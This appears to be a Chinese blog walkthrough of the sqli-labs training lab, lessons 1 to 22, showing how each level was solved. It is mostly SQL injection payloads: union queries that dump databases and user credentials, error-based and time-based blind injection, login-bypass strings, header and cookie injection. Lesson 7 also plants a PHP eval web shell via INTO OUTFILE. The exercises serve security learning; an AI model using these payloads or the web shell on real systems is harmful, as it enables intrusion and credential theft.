sqli-labs(lesson1-lesson22)

lesson1:

插入單引號報錯



id被單引號包裹郭赐,確認字段數(shù)

?id=1' order by 3--+

字段為3兄猩,使用union select 1,2,3聯(lián)合查詢語句查看頁面是否有顯示位

?id=-1' union select 1,2,3--+


有兩個顯示位,接下來開始爆庫名

?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+


爆表

?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+


爆列

select group_concat(column_name) from information_schema.columns where table_name='users'


爆值

union select 1,group_concat(username,0x3a,password),3 from users

lesson2:

插入單引號



由報錯判斷為數(shù)字型注入,注入方法同上,把單引號去掉就好


lesson:3

插入單引號報錯,輸入?id=1')--+發(fā)現(xiàn)可以正常顯示边臼,判定為字符型注入



注入方法同上,在單引號后面加個括號即可


lesson4:

插入單引號沒反應假消,換用雙引號后報錯柠并,注入方法同上


lesson:5


看到這個報錯有可能是布爾型盲注,時間盲注富拗,報錯注入
注入

?id=1’ and sleep(5)--+發(fā)現(xiàn)有延遲


考慮使用報錯注入

1. 通過floor報錯

and (select 1 from (select count(),concat((payload),floor (rand(0)2))x from information_schema.tables group by x)a)
其中payload為你要插入的SQL語句
需要注意的是該語句將 輸出字符長度限制為64個字符

2. 通過updatexml報錯

and updatexml(1,payload,1)
同樣該語句對輸出的字符長度也做了限制臼予,其最長輸出32位
并且該語句對payload的反悔類型也做了限制,只有在payload返回的不是xml格式才會生效

3. 通過ExtractValue報錯

and extractvalue(1, payload)
輸出字符有長度限制啃沪,最長32位粘拾。

使用floor報錯語句注入

?id=1' and (select 1 from (select count(),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)2))x from information_schema.tables group by x)a) --+


輸出信息超過一行,只能用limit 0,1一個個輸出了

?id=1' and (select 1 from (select count(),concat(((select concat(schema_name,';') from information_schema.schemata limit 0,1)),floor (rand(0)2))x from information_schema.tables group by x)a) --+


庫名出來了创千,接下來方法就和之前一樣了

lesson6:

同樣的原理缰雇,把?id=1'的單引號換成雙引號就行

lesson7:

輸入?id=1



輸入?id=1 and 1=2回顯正常,不是數(shù)值型注入
嘗試加入單引號發(fā)現(xiàn)報錯追驴,換成雙引號也是一樣械哟,加上)依然報錯
輸入id=5')) --+



暗示向服務器寫文件?
因為我用的是phpstudy搭的環(huán)境,所以我直接用電腦上的目錄

使用語句

union select 1,2,3 into outfile "D:\Software\phpstudy\PHPTutorial\MySQL\wh1te.php"


寫入成功
上傳木馬殿雪,使用cknife鏈接
?id=-1')) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "D:\Software\phpstudy\PHPTutorial\MySQL\muma.php" --+


lesson8:

輸入?id=2' --+回顯正常



字符型注入暇咆,方法同上

lesson9:

輸入?id=1' and sleep(5) --+存在延遲,判斷為延遲型注入


lesson10:

同上,單引號換雙引號

lesson11:

登陸界面爸业,使用萬能密碼

admin' or 1=1#


登陸成功其骄,開爆
爆庫:

admin' union select 1,group_concat(schema_name) from information_schema.schemata #

爆表:

admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

爆字段:

admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

lesson12:

admin") or 1=1 #

之后方法同上

lesson13:

admin') or 1=1#

頁面無返回信息,只能進行盲注
猜長度
admin') or length(database())>要猜的長度 and sleep(5)#
猜庫名:
admin') or left(version(),1)>'要猜的庫名' and sleep(5)#
猜表名:
admin') or ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>要猜的表名ASCII and sleep(5)#

lesson14:

admin“ or 1=1#

之后方法同上

lesson15:

admin' or 1=1#

之后方法同上

lesson16:

admin") or 1=1 #

和上面一樣沃呢,無返回信息年栓,但是可以使用延時注入判斷注入點

admin") and sleep(5) #

其余同上

lesson17:

做到自閉,查看源碼



加了用戶名注入過濾薄霜,但是沒有密碼注入過濾,所以纸兔。惰瓜。。你懂的

lesson18:

莫得用戶名和密碼注入了



查看源碼

$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

存在利用構(gòu)造User Agent進行注入的可能汉矿,上brupsuit抓包改User Agent

' or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) , 1, 1) #

得到mysql版本



同理崎坊,可得表名等信息
表名

' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) , 1, 1) #

lesson19:

Refer注入

' or (select 1 from (select count(),concat(database(), '~' , floor (rand()2))as a from information_schema.tables group by a) as b limit 0,1) , '1')#


其余方法同上

lesson20:

查看源碼

$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

存在cookie注入

uname = ' union select 1 , 2 , database()#


其他同理

lesson21

和上題一樣,屬于cookie注入洲拇,先看源碼



和上題基本一樣奈揍,之不過給用戶名(uname)進行了base64加密,對注入語句進行加密即可

注入語句:
admin1')and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#
加密后payload:
YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=


報錯注入

lesson22

與上題基本一樣赋续,'改成”即可

" union select 1,2,database()#
payload:IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末男翰,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子纽乱,更是在濱河造成了極大的恐慌蛾绎,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,378評論 6 481
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件鸦列,死亡現(xiàn)場離奇詭異租冠,居然都是意外死亡,警方通過查閱死者的電腦和手機薯嗤,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,356評論 2 382
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門顽爹,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人骆姐,你說我怎么就攤上這事镜粤。” “怎么了诲锹?”我有些...
    開封第一講書人閱讀 152,702評論 0 342
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵繁仁,是天一觀的道長。 經(jīng)常有香客問我归园,道長黄虱,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,259評論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任庸诱,我火速辦了婚禮捻浦,結(jié)果婚禮上晤揣,老公的妹妹穿的比我還像新娘。我一直安慰自己朱灿,他們只是感情好昧识,可當我...
    茶點故事閱讀 64,263評論 5 371
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著盗扒,像睡著了一般跪楞。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上侣灶,一...
    開封第一講書人閱讀 49,036評論 1 285
  • 城市分裂傳說
    那天甸祭,我揣著相機與錄音,去河邊找鬼褥影。 笑死池户,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的凡怎。 我是一名探鬼主播校焦,決...
    沈念sama閱讀 38,349評論 3 400
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼统倒!你這毒婦竟也來了寨典?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 36,979評論 0 259
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤檐薯,失蹤者是張志新(化名)和其女友劉穎凝赛,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體坛缕,經(jīng)...
    沈念sama閱讀 43,469評論 1 300
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡墓猎,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,938評論 2 323
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了赚楚。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片毙沾。...
    茶點故事閱讀 38,059評論 1 333
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖宠页,靈堂內(nèi)的尸體忽然破棺而出左胞,到底是詐尸還是另有隱情,我是刑警寧澤举户,帶...
    沈念sama閱讀 33,703評論 4 323
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布烤宙,位于F島的核電站,受9級特大地震影響俭嘁,放射性物質(zhì)發(fā)生泄漏躺枕。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,257評論 3 307
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望拐云。 院中可真熱鬧罢猪,春花似錦、人聲如沸叉瘩。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,262評論 0 19
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽薇缅。三九已至危彩,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間泳桦,已是汗流浹背恬砂。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評論 1 262
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留蓬痒,地道東北人。 一個月前我還...
    沈念sama閱讀 45,501評論 2 354
  • 代替公主和親
    正文 我出身青樓漆羔,卻偏偏與公主長得像梧奢,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子演痒,可洞房花燭夜當晚...
    茶點故事閱讀 42,792評論 2 345

推薦閱讀更多精彩內(nèi)容

  • web應用程序會對用戶的輸入進行驗證亲轨,過濾其中的一些關(guān)鍵字,這種過濾我們可以試著用下面的方法避開鸟顺。 1惦蚊、 不使用被...
    查無此人asdasd閱讀 7,262評論 0 5
  • MSSQL 跨庫查詢(臭要飯的!黑夜) 榨干MS SQL最后一滴血 SQL語句參考及記錄集對象詳解 關(guān)于SQL S...
    碧海生曲閱讀 5,557評論 0 1
  • Sql注入定義: 就是通過把sql命令插入到web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執(zhí)行...
    付出從未后悔閱讀 686評論 0 3
  • 百分之六閱讀 1,454評論 0 2
  • 相信大家一定對動畫片《冰河世紀》的猛犸象曼尼印象深刻莉掂。 它高大威猛,四肢粗壯千扔,一對長長的象牙猶如鋒利的月牙刀憎妙。 這...
    玄空小叔閱讀 652評論 0 1